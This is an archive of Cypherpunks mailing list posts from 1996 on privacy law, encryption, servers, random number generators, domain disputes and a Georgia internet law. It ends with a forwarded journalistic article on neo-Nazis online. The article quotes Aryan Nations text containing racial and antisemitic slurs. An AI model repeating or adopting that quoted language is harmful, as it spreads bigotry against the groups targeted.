>compiling.

        Huh, can I ask who you purchased this list from and how much was my
privacy bought/sold for? (I might have sold it cheaper! <grin>)

>You can log onto my web site http://www.directnet.com/~spiegel, and 
>register not to be on the list. There are no graphics on the web page, its 
>just a form, so it won't take long to load.  All you need to leave is your 
>email address  (the rest, even your name is optional) and press submit.
>
>Before you get upset, think about it, you are already on some kind of list, 
>because I have your address. Registering at my web site will only take you 
>off the list. There is no advertising on the page, there is no money being 
>made by this.
>
>I will take your name off of this list and off any other list that  other 
>mailers submit. I will not give your name or address out to anyone else.
>
>I know that some people don't have browsers and only have mail access. If 
>you are among that group, please send email to me at  mobius@llv.com and be 
>sure to put your email address in the subject field and nothing in the body 
>of the letter.
>******************************************************************
> DO NOT REPLY AND SEND BACK THIS LETTER, IT WILL BE IGNORED BY MY SYSTEM !
>******************************************************************
>By the way, if you get junk mail, refer them to my web site as well and by 
>all means, tell your friends to register.
>
>Maybe this will help.
>
>Oh, and if you don't care about junk mail, you don't have to do a thing!
>
>Thank you
>
>Jack Spiegel
>
>
>
>
>
_______________________
Regards,            I am a creationist; I refuse to believe that I could have
                    evolved from humans.
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Mon, 22 Apr 1996 09:17:36 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [getting noisy] Re: 5th protect password?
In-Reply-To: <m0uB2v1-00090gC@pacifier.com>
Message-ID: <Pine.BSF.3.91.960421134036.8631B@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> >I think you missed the main pattern... When a suspect is required to
> >provide fingerprints, voice, blood and/or handwriting samples, those
> >things are used exclusively for _identification_.
> >The only exceptions I can think of are when blood, breath and urine
> >samples are taken from a suspect to detect certain chemicials in the body. 
> >But, AFAIK, those exceptions are entirely the product of the recent war on
> >drugs. 

> This is odd.  By mentioning those exceptions you just destroyed your 
> argument.  If you were trying to claim that "identification"-intended 
> evidence was not protected by the 5th amendment, mentioning samples taken to 
> detect drugs are obviously not of this type.  The implication is that they 
[SNIP]
> This, as you might expect, is getting hilarious.  Somehow, I think 
> everything that might be construed as a violation of the 5th is going to be 
> called "a special case" or "an exception" by those who see no problem, or at 
> least those who are not willing to admit to a problem. 

No need to be so defensive, Mr. Bell... I didn't say that samples used to
detect drugs are OK under the constitution. I just said that, IMNALO,
samples taken for identification have always been okay. The samples taken
to detect unauthorized molecules are the exception to the identification
rule I noted. I do agree that requiring people to provide such samples to
detect illegal substances (as I said, a recent development) is wrong. 

I wasn't trying to score points for either side of the debate, I was just
pointing out that _before_the_war_on_drugs_, the samples listed in the
previous post were used exclusively for identification.

Handwriting, fingerprints, and voice (not to mention name and appearance)
are still used exclusively for idenitification. Breath and urine (items
that I added when I mentioned the war on drugs) are used exclusively for
detecting chemicals (although I think DNA can be found in urine). 

Just my two bits. That's all I'm willing to spend on this discussion. 
Only time will tell whether or not the courts will force people to provide
encryption keys. 


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Mon, 22 Apr 1996 00:49:33 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: 5th protect password?
In-Reply-To: <m0uAq1k-00091WC@pacifier.com>
Message-ID: <Pine.3.89.9604211321.A14720-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


	Jim:

On Sat, 20 Apr 1996, jim bell wrote:

> >	illiteracy was the standard, till the begining of the Industrial
> >	Revolution.   <<   Remember that John Dee had an incredibly large
> >	library of 200 volumes.  >> 
> 
> Yikes! You REALLY need to learn to read!  I wasn't referring to handwriting 

	& you totally missed my point that when literacy was a rare thing,
	there was no presumption that any individual could either read, or
	write.   The rest of the things listed required no presumption
	about anything related to an individual.  

> itself , or for that matter to graphology ( the study of handwriting; which 
> goes back perhaps 2000 years) but in fact the _forensic_ use of graphology.  

	The first book about graphology was written in 1622 by
	C Baldi.  The first book on questioned document examination
	was written in the 1860s.   

	The first forensic use of graphology may have occurred as early 
	as 1960.  In 1975, a Juvenile Court Judge in Boulder CO used
	graphology forensically to determine the most appropriate method
	of handling some of the cases that appeared in _his_ court.

	Most courts in the United States regard the forensic use of
	graphology as dubious, at best.   A few have ruled against 
	it. 

> The point is that the demanding of handwriting samples is a fairly new 
> What do you want to bet that it first occurred in this century?

	For questioned document examination?   Sometime during the
	sixties.  
	For graphological examination?  Hasn't occurred yet.  

> If that were the case, there there would be no justification for demanding a 
> handwriting sample.  Nevertheless, it is apparently done.   And while a 

	Can you provide a citation where a court has demanded a handwriting
	sample for graphological purposes?   

	They can, and do require handwriting samples for questioned
	document examination.   

> In any case, the initial reference to handwriting samples came from the 
> Supreme Court, as quoted above, not me.  Pay more attention.  I was using 

	A ruling that had no relationship to graphology ---- which is a 
	subject that you brought up.

> >	I suspect you confusing graphology with questioned document
> >	examination. 
> No, that's a larger issue. Graphology is a tool which can be used, but there 

	I was wondering how you were going to try to wriggle out of 
	this one.  

> Question:  Let's suppose, for the purposes of argument, the policy was 
> diametrically opposite, and no such samples were taken, ostensibly because 

	The gist of the argument is that handwriting samples are public,
	and that things are written for public consumption, not private 
	consumption.  

> would come to the opposite conclusion.  You would have to explain to people 
> why the precedents were all wrong.


	You are taking a completely hypothetical situation that never had
	a basis in what could have happened.

	An individual who had seen another individual's handwriting _once_
	could deem themselves to be an expert, for that particular person's
	writing.  As such, an illiterate stable boy, who had seen his 
	master writing something twenty years prior, was deemed 
	more knowledgable
	about his master's script, than a QDE who had exemplars and
	the suspect document, and could demonstrate the authenticity or
	lack thereof, from the script.  

	After several cases where the QDE's opinion was deemed incorrect,
	and later it was discovered that the QDE's opinion was correct,
	the rules of the acceptability of an expert witness became somewhat
	stricter.  

	As the rules regarding who could be an expert witness became
	stricter, the requirements for obtaining authentic samples
	of writing became more urgent.   Subpoenaing documents from
	numerous bodies << corporations and individuals >> became a 
	standard way of obtaining exemplars.  Such exemplars were/
	are not always satisfactory, because they may be signatures
	only -- in the case of checks, or be written under non-ordinary
	conditions --- such as filed tax forms, or other reasons.

	By requesting an individual provide an authentic sample, 
	the ease with which a document can be demonstrated to be
	authentic, or not, is considerbly increased.  And the 
	likelyhood of error creeping in, is decreased dramatically.

	Now if you'd rather have an illiterate stabhle boy, that saw
	you write something 20 years ago be considered an expert as
	regards what your handwriting looks like...

> demanded of a defendant in 1783, which was about when the 5th amendment was 
> written.

	What they said.
	Where they said it. 
	What they had in their possession.
	Where they had said items in their possession.

	Note in passing that rules for admitting something into 
	evidence was a lot looser then, than it is now. 

> >        Owner:     Graphology-L@Bolis-com 
> Aha!  Yet another person who benefits from current government policy! 

	I do?   That's news to me, and the rest of graphological profession
	that we benefit from current government policy --- especially in
	light of rulings that imply that graphology can not be used for 
	employment screening, selection or profilling.   

        xan

        jonathon
        grafolog@netcom.com

        Owner:     Graphology-L@Bolis-com 


**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 22 Apr 1996 09:46:27 +0800
To: umwalber@cc.UManitoba.CA
Subject: Re: ApacheSSL
In-Reply-To: <199604201850.NAA09592@electra.cc.umanitoba.ca>
Message-ID: <317AAC9A.3DB4@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Sean A. Walberg wrote:
> 
> An ISP that I have ties with  is looking to set up a secure server.
> Currently, they are running Apache.  I told them that for ~$500 they
> can put on Apache SSL and be all ready.  However, they want to buy
> Netscape (for the name, I've already given them the 40bit gospel),
> put it on a separate, firewalled machine, allow no access to it, etc,
> etc.  Is all this paranoia necessary?

  I won't argue about the merits of Apache vs. Netscape servers.
However I will point out that if your ISP friend is in Canada, they
can get the 128-bit version of the Netscape server.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 22 Apr 1996 09:58:52 +0800
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Smartcards are coming to the US
Message-ID: <v02120d12ada05b56a034@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:15 4/21/96, Brad Dolan wrote:
>Saw a CNN story Friday about an interesting special debit card
>application in Mexico.  They're being issued to poor Mexicans, who can
>use them to buy tortillas and a few other foodstuffs.  The cards are tied to
>a behavior-control database and failure to send kids to school, get
>mandatory medical exams/treatments/vaccinations, etc. results in card
>deactivation.

My first response was: he is making this up. But it shoudn't come as a
surprise to any reader of this list. Expect to see more of it.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 22 Apr 1996 09:50:51 +0800
To: unicorn@schloss.li>
Subject: Re: OS/2 encryption
Message-ID: <v02120d15ada05def3c52@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:53 4/21/96, mirele@xmission.com wrote:

>And then the humourless gits of the Church <spit> went to the trouble to
>get an attorney in New York City to threaten me.  I'm taking the threat
>very seriously.  This (looking for more secure ways to keep my computer
>from being trashed) is part of it.

Back up the HD to tape (encrypt the data on the tape). Move the tape out of
reach. And don't tell anyone, especially not this list, that you did that.

Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 22 Apr 1996 07:33:59 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Smartcards are coming to the US
In-Reply-To: <v02120d05ad9f2fef5d94@[192.0.2.1]>
Message-ID: <Pine.SOL.3.91.960421151036.4476E-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Saw a CNN story Friday about an interesting special debit card 
application in Mexico.  They're being issued to poor Mexicans, who can 
use them to buy tortillas and a few other foodstuffs.  The cards are tied to 
a behavior-control database and failure to send kids to school, get 
mandatory medical exams/treatments/vaccinations, etc. results in card 
deactivation.

bd

On Sat, 20 Apr 1996, Lucky Green wrote:

> Years after smartcards have become ubiquitous in such countries as Pakistan
> and Nepal, not to mention Europe, I just saw my first smartcard commercial
> ever on US television.
> 
> Way to go :-)
> 
> 
> 
> Disclaimer: My opinions are my own, not those of my employer, DigiCash, Inc.
> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Mon, 22 Apr 1996 12:43:05 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymnity at teleport
Message-ID: <2.2.32.19960421221944.006df628@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:29 PM 4/21/96 EDT, Allen wrote:
>	A bit of interesting information about teleport. Still not as good
>as c2 (as I stated), but it's still good to have multiple anonymous account
>providers around... whether or not they mean to be anonymous. This is from a
>sysadmin type there (why I deleted the name) who I'll ask about the Majordomo
>patch.
[snip]

And to think I gave them my real name...

Do check about the majordomo patch.  It's saved list owners here a lot of
headaches.  I'm not sure what it would take to implement, but the end result
is very good, IMHO.


Rich

       
______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 22 Apr 1996 10:49:28 +0800
To: cypherpunks@toad.com
Subject: Re: rng hardware running ...
Message-ID: <199604212245.PAA20254@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>The dist of 0 vs 1 is documented as being slightly skewed (.05%) toward
>>1s. 
>If the RNG chips aren't too expensive, you could take the output from 2 (or
>more) of them and XOR the outputs together to reduce skew.

There are all sorts of statistics you can look at that may help you
understand the quality of the randomness you're getting.  One of the central
concerns is finding the underlying patterns and the random noise driving them,
though in this case we're looking for the noise and dumping the patterns
rather than the opposite.

Some things that are good to look at are first and second differences of the 
series (e.g. take Y1=X2-X1, Y2=X3-X2, ... and Z1=Y2-Y1, Z2=Y3-Y2... and on up
for higher differences) and look for distributions and patterns there.
You may also want to look at moving averages (take a window of K samples
and slide that through the sample space, for several values of K.)
This stuff is similar to Fourier-series analysis for discrete-valued data.

If you want to read lots of gory details on the math, the book by
Box and Jenkins on Time Series Analysis was one of the best textbooks
~20 years ago.   As my professor put it, if you stare at the numbers long
enough,
you can find all sorts of things in them, which may or may not really be
there :-)
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 22 Apr 1996 11:23:54 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: 5th protect password?
Message-ID: <m0uB87E-00092FC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:13 PM 4/21/96 -0700, Steve Reid wrote:

>No need to be so defensive, Mr. Bell... I didn't say that samples used to
>detect drugs are OK under the constitution. I just said that, IMNALO,
>samples taken for identification have always been okay. The samples taken
>to detect unauthorized molecules are the exception to the identification
>rule I noted. I do agree that requiring people to provide such samples to
>detect illegal substances (as I said, a recent development) is wrong. 
>
>I wasn't trying to score points for either side of the debate, I was just
>pointing out that _before_the_war_on_drugs_, the samples listed in the
>previous post were used exclusively for identification.

And _my_ point was that before about 1900 or so, the various 
"identification" (your distinction, not mine)
examples that were listed by the SC were not demanded, and not regularly 
demanded.  I came to what I considered (and still consider) a reasonable 
conclusion: The Constitution does not support (and certainly does not 
OBVIOUSLY support) exceptions based on identification principles.  I don't 
doubt that somebody could have presented this (the "identification" aspect) 
as intended to sound like a reasonable exception; the issue is whether this 
is just an opportunistic justification or whether there is some logical 
basis for this position.


That latter conclusion would have been stronger if there had been no 
exceptions to the 5th amendment other than identification techniques. But 
the "straw that broke the camel's back" principle is at work here:  Having 
added the drug-testing issues to the mix, the fig leaf has dimished in size, 
and it becomes harder (and, in fact, impossible) to explain why the natural 
interpretation of a document written in 1783 could be so CONVEEEEENIENTLY 
re-interpreted so as to allow exceptions which were did not become technologically 
"interesting" for 150-200 more years.  The most obvious interpretation is 
that whenever an investigative technology that the cops would like to use 
appears, and if that technology appears to be proscribed by some 
Constitutional protection, the Constitution is automatically re-interpreted 
to allow it anyway.  The exceptions occur only when the new technique is so 
unreliable (polygraph, for instance) that certainty of test results can't be 
guaranteed.  This is particularly true when the technique has just as much, 
if not more, ability to cause an acquittal as a conviction.


The reason this subject is NOT noise is that the issue of providing decrypt 
keys is going to be a more and more important issue, and it is vital
that faulty precedents be replaced by good ones.  It would be very useful to 
be able to prove that the only reason these "exceptions" are considered 
exceptions is that somebody thought they'd be a useful investigative 
technique, and was pissed when it was denied to him.

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Mon, 22 Apr 1996 08:22:51 +0800
To: spooner-l@netcom.com
Subject: (fwd) Important new web site discusses risks of loss of domain names
Message-ID: <199604212005.QAA06633@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


[Original article has been snipped to save space. The report will probably
be of particular interest to anarcho-capitalists, extropians, and other
followers of polylegal systems.]

>From: oppedahl@patents.com (Carl Oppedahl)
Newsgroups: misc.news.internet.announce
Subject: Important new web site discusses risks of loss of domain names
Date: 21 Apr 1996 11:41:05 GMT

Three graduate students at the George Washington University Law School 
(David Pauker, Stacey Halpern, and Jonathan Agmon) have prepared what 
is surely the definitive and comprehensive resource covering Internet 
domain name disputes provided, appropriately enough, in the form of a 
topic-specific web site.  The site, called "What's in a Name?", is 
located at <http://www.law.georgetown.edu/lc/internic/domain1.html>.

*Who should visit this site*

For anybody who has a domain name ending in COM, ORG, GOV, EDU, or 
NET, this site is a must-read.  It illustrates vividly how vulnerable 
any domain name owner is to loss of a domain name on just 30 days' 
notice, without any of the usual legal safeguards against loss of a 
valuable property right.

*What's there*

It will be apparent to any visitor that the "What's in a Name?" web 
site is the result of a prodigious amount of effort.  The authors have 
drawn together nearly everything about the twenty-five publicly known 
domain name disputes, and provide a synopsis of each dispute as well 
as links to further information about them.  (Because Network 
Solutions Inc. (NSI) conducts its decisionmaking process regarding 
domain name disputes in secret, one can only speculate how many other 
domain name disputes have arisen and how NSI decided the disputes.  
The authors can't be blamed for not knowing about all of the dispute 
decisions that NSI has made.)

The authors go on to provide helpful background to trademarks and 
domain names, they discuss in detail the present NSI domain name 
policy, and they review a number of proposed replacements for the 
present flawed NSI policy.

As counsel for Roadrunner Computer Systems Inc. in its lawsuit against 
NSI, I was particularly interested in the authors' comments on the 
present NSI policy, for example:

"In the United States, NSI's Dispute Resolution Policy does not take 
account of common law or state registered trademarks, unfair business 
practices, dilution, or conflicts with even well known marks.

"NSI's Dispute Resolution Policy is an imposed contract predicated on 
unequal bargaining power, failing to provide a proper mechanism for 
adjudicating disputes. 

"NSI, a private company, is acting in a quasi-judicial manner with 
limited mechanisms for judicial review."

[snippage]

--
frogfarm@yakko.cs.wmich.edu   free market anarchist, natural law advocate,
 s..O).... You hit the smurf! --More--         male, lesbian, polyamorous,
 @.../.".. You destroy the smurf! --More--       reader, atheist, chaotic,
 $$*...].. You feel cynical!         free and natural sovereign individual





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Mon, 22 Apr 1996 09:01:38 +0800
To: cypherpunks@toad.com
Subject: Re: Georgia Legislation - Remailer Effect???
In-Reply-To: <199604202128.QAA09545@rex.isdn.net>
Message-ID: <9604212054.AA03211@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain


[NOTE: These are my opinions, not those of my employer (Who is
 mentioned below :).]

> Georgia OKs "Net Police" law
> 
>                 By Rose Aguilar
>                 April 19, 1996, 5 p.m. PST 
> 
>                 A bill signed into law this week by Georgia Governor 
> Zell Miller has sparked yet another firestorm

	*Sigh*.  Well, now I know voting for Bill The Cat wasn't a
mistake. :)

>                 House Bill 1630 was introduced on February 8 by
> Georgia House of Representatives member Don Parsons
> (R-Marietta). The bill makes it illegal to

	Ah, Cobb County.  That would explain it.  That's Mr. Newt's 
stomping grounds, for y'all unfamiliar with Georgia.

>                 Parsons says he drafted the bill to solve the
> problem of online impersonation. "Back in the winter I started
> hearing about home pages through the news that offer remedies and
> health related services.  To the untrained eye the pages make it
> appear that the information provided is valid and could be some kind
> of remedy," Parsons said. "After some thought and research I decided
> to present the bill."

	Can't prosecute those under existing fraud statutes if they're
using one of them newfangled com-pootrs now can we.

>                 The problem is that the wording of the law leaves it
> open to multiple interpretations, according to the EFF. "He created
> a very vague law that could very well make everyone on the Internet
> a criminal," said Steel. Furthermore, the EFF is accusing Parsons of
> introducing the bill to help his employer, Bell South, win a
> lawsuit.

	Didn't this get cleared up with whomever it was that got the
"mcdonalds.com" domain (some Wired reporter?)?

>                 Kaye is the Web master of a site called the
> Conservative Policy Caucus (CPC), which posts information about
> House activities from the viewpoint of the conservative legislative
> caucus. During debate over his bill, Parsons referred to the CPC
> site as an example of one that passes itself off as an official
> government site.

	There was something about this on the local news.  The big
brouhaha was that the CPC page used the state seal "improperly".
Again, doesn't existing trademark law cover this?

	Gee, I wonder if my email address is sufficently vague that
I'm now a criminal . . . .

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 22 Apr 1996 09:24:38 +0800
To: cypherpunks@toad.com
Subject: Was the clause for Biometric ID Cards dropped?
Message-ID: <01I3T7J6YK8W8Y4Y84@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	As the subject line says, was the proposal for Biometric ID Cards
dropped? I saw something about it on here and forwarded it; my respondent
(Phil Agre of the RRE news service) says he thought that clause had been
dropped.
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 22 Apr 1996 11:28:25 +0800
To: cypherpunks@toad.com
Subject: Nazis on the Net
Message-ID: <01I3T7WPGNL48Y4Y84@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	In view of the Zundelsite business, I thought people might find the
following of interest. Unfortunately, the author is either leaving
some critical information out or is misinformed. Specifically, the actual
history on the Zundelsite business, and the actual circumstances at Ruby Ridge; 
on the latter, Randy Weaver was neither a neo-Nazi nor a racist. He was (and,
so far as I know, still is) a white separatist. (One would think liberals would
tolerate this - they tolerate the equally offensive black separatists, after
all...). The Zundelsite reference is incomplete in that it fails to describe
the motivations of the mirrorsites.
	-Allen

From:	IN%"rre@weber.ucsd.edu" 20-APR-1996 22:29:19.43
From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Wed, 17 Apr 1996 08:27:22 GMT
From: Crawford Kilian <ckilian@hubcap.mlnet.com>
Subject: Nazis on the Net

I published the following rather long article in the Georgia Straight, a
Vancouver weekly paper, on April 11. It may be of interest for the issues
of free speech and Internet access that it deals with. You may, however, 
find some passages disturbing or offensive; I certainly do.

Nazis on the Net
by Crawford Kilian

The far right has become very visible lately. New groups and movements have
sprung up here, in the US, and in Europe; old groups have revived. They go
under many names: neo-Nazis, Holocaust deniers, racist skinheads, militias,
white nationalists. They often seem to disagree with one another as intensely
as they disagree with the status quo, and their ideology ranges from the
sophisticated to the incoherent.

Psychologically they seem to bear a striking resemblance to many of the North
American communists of the 1930s and 40s. Like the Reds, they see themselves
as the persecuted vanguard of a morally superior group (whites instead of
workers) which unaccountably fails to recognize its own interests.
Politically, though, they are very far indeed from the Reds--all the way over
on the far end of the spectrum. So let's call these groups the
"Ultra-violets," or Ultras for short. Whatever we may think of their views,
they deserve attention as a phenomenon--especially as a phenomenon that tests
other people's genuine commitment to democratic values like freedom of
speech, freedom of the press, and open debate. But the Ultras would be far
less significant if they were not exploiting a technology designed to defend
just those democratic values: the Internet.

The creators of the original Internet --back in the '60s, during the Cold
War--built it to survive multiple nuclear strikes. Even if Soviet H-bombs
vaporized scores of cities and military bases, information would still flow
between surviving computers to sustain a defence and counterattack. Democracy
would withstand nuclear war, even if most of its supporters would not.

Whether democracy can withstand the rigorous application of its own values is
now in question. Designed to be unkillable, today's Internet looks
uncontrollable. We now possess a communications system in which anyone can
say anything to anyone else. People can be obscene, scurrilous,
malevolent--and no one can silence them.

Other nations, democratic and otherwise, are alarmed about the political and
cultural consequences of free Internet discourse. Singapore wants its three
million citizens to live on an "intelligent island" wired into the Net--but
it doesn't want pornography or political dissidence leaking in. China is
equally cool to the idea, given its memories of the fax invasion it suffered
in 1989, when overseas Chinese students bombarded campuses at home with news
and pictures of the Tiananmen Square massacre.

The Ultras pose a complex challenge. They've taken to the Internet eagerly
and effectively. They have their own newsgroups, discussion areas available
to almost anyone with access to the Internet. They also run listservs,
discussions open only to subscribers (and subscribing is usually quite easy).
The Ultras have their own websites, locations holding extensive texts and
graphics which computer users can view and copy onto their own machines.
Along with the pornographers, the Ultras provoke repeated calls for limits on
Net freedom of speech, calls that are sometimes answered: those who supply
the Ultras with Net access often cancel their accounts.

Because their views are so unpopular, the Ultras make themselves a litmus
test for the rest of us: Does freedom of speech mean tolerating racism and
anti-Semitism? And if it does, should we respond with contemptuous silence?
Or should we devote time and energy to detailed rebuttal of Ultra views?

To answer those questions, it helps to know what--and whom--we're talking
about. Look at the live Ultras on the Net and you find few who match the
stereotype of the halfwitted skinhead or the paranoid pretend-soldier of the
militia.

For one thing, most are far from illiterate. The texts on Don Black's
Stormfront website, for example, are generally clear and articulate. While I
can't judge his German-language materials, his texts in Spanish are also
well-written. Running a trilingual website reflects a cosmopolitan
outlook--another challenge to stereotype.

Many Ultras try to make an academically documented case for their views. Marc
Lemire of the Digital Freedom BBS in Toronto posts long reviews of books
questioning the Holocaust or documenting the firestorm that destroyed
Dresden. Greg Raven of the Institute for Historical Review (a
Holocaust-denying group in California) says revisionism has no connection
with neo-Nazism, white nationalism, or other Ultra positions: "Historical
revisionism is supposed to be a part of writing history (historiography). As
time passes, we gain new information and new insights, which allow us to
better perceive not only the facts of events but also their context.
Furthermore, the IHR is neither ideological nor political."

For a time last year, Raven offered a link to the home page of the North
Shore News, which carries Doug Collins's columns supporting Holocaust
revisionism and other Ultra positions. When the News discovered the link, it
asked Raven to close it; he promptly did so.

Raven's home page explicitly denies carrying anything racist or hateful and
promises to withdraw anything criticized as such. Nevertheless, Raven doesn't
ask Stormfront to close its links to his own home page. And Stormfront is
avowedly White Nationalist. Based in West Palm Beach, Florida, Stormfront
features Nazi-style Gothic lettering, numerous links to sympathetic groups
elsewhere in the US and Canada, and extensive texts and graphics. According
to Milton John Kleim, Jr., who calls himself "Net Nazi Number One,"
Stormfront "lists just about every important individual and group that should
be noted."

Indeed, the Net itself is the common denominator of the Ultras. They may
disagree with one another, even quarrel bitterly, but they keep the lines of
communication open to one another. That's because without the Net, the Ultras
are scattered and isolated. Marc Lemire describes his own progress in Ontario
(via e-mail, as is the case with most quoted material here):

"On April 1, 1995 I started up Digital Freedom BBS (416) 462-3327.  I also
got two Internet sites and began forging a lot of contacts with likeminded
people on the Internet.  Within four months I had an E-mailing list of around
400+ and contacts with all the Sysops and leaders throughout the United
States and Canada.  We are also working quite closely with European leaders.
We have our address on two Web sites and I post to Usenet almost every day."

Milton Kleim, in Minnesota, has found a similar community forming through the
Net: "All of my comrades and I, none of whom I have ever met face-to-face,
share a unique camaraderie, feeling as though we have been friends for a long
time. Selfless cooperation occurs regularly amongst my comrades for a variety
of endeavors.  This feeling of comradeship is irrespective of national
identity or State borders."

Is the Net a useful means of recruiting sympathizers? "Absolutely," says
Kleim. "There are millions of people who agree with us, but feel isolated and
helpless because they don't know who to contact to network with others who
feel similarly... Usenet, in combination with the Web, offers unparalleled
opportunity for our Movement to get our views and more importantly our facts
across to the general public." He's even created a manual, "Tactics and
Strategy for Usenet," advising Ultras on how to use the medium to attract and
hold sympathetic "newbies." And Lemire says a little publicity goes a long
way: "Digital Freedom has been listed in over 5 different publications in the
Toronto area, which has brought us over 1800 users."

What else do Ultras share besides a sense of camaraderie? Stormfront
currently offers several major documents: three long articles about the US
government's attacks on the Branch Davidians in Waco and on an Ultra family
in Ruby Ridge, Idaho; an article about a Canadian rabbi who wants Net
censorship and another about the Chretien government's "gun grab"
legislation. Other articles deal with racial issues. In one, ex-Klansman
David Duke finds much to admire in the Indian caste system.

Stormfront also offers links to like-minded pages. The Aryan Nations page,
for example, after describing Jews as a "virus," rejects the label of "hate
group": "It is not hate that makes the average White man look upon a mixed
racial couple with a scowl on his face and loathing in his heart. It is not
hate that makes the White housewife throw down the daily jewspaper [sic] in
repulsion and anger after reading of yet another child-molester or rapist
sentenced by corrupt courts to a couple short years in prison or on parole.
It is not hate that makes the White workingman curse over his beer about the
latest boatload of mud-creatures dumped upon our shores to be given job
preference over the White citizens who build this land.* No, it is not hate,
IT'S LOVE."

Other links offer Net surfers access to Resistance Records, producers of
skinhead music; the British National Party; the Independent White Racialists
("Your skin is your uniform."); and a collection of Canadian groups known as
Freedom Site: the Heritage Front, the Canadian Patriots Network, Citizens for
Foreign Aid Reform, and others.

Another recent link is the Pat Buchanan for President home page. Although
Stormfront's Black doesn't consider Buchanan adequately "racialist," he feels
the candidate is worth supporting. Fellow-Ultras like Milton Kleim strongly
disagree, and advocate voting for the "Bolshevik" Bill Clinton instead. This,
they say, will ensure that life will become more rapidly intolerable for
exploited whites, rousing them from their apathy to join the Ultra cause.
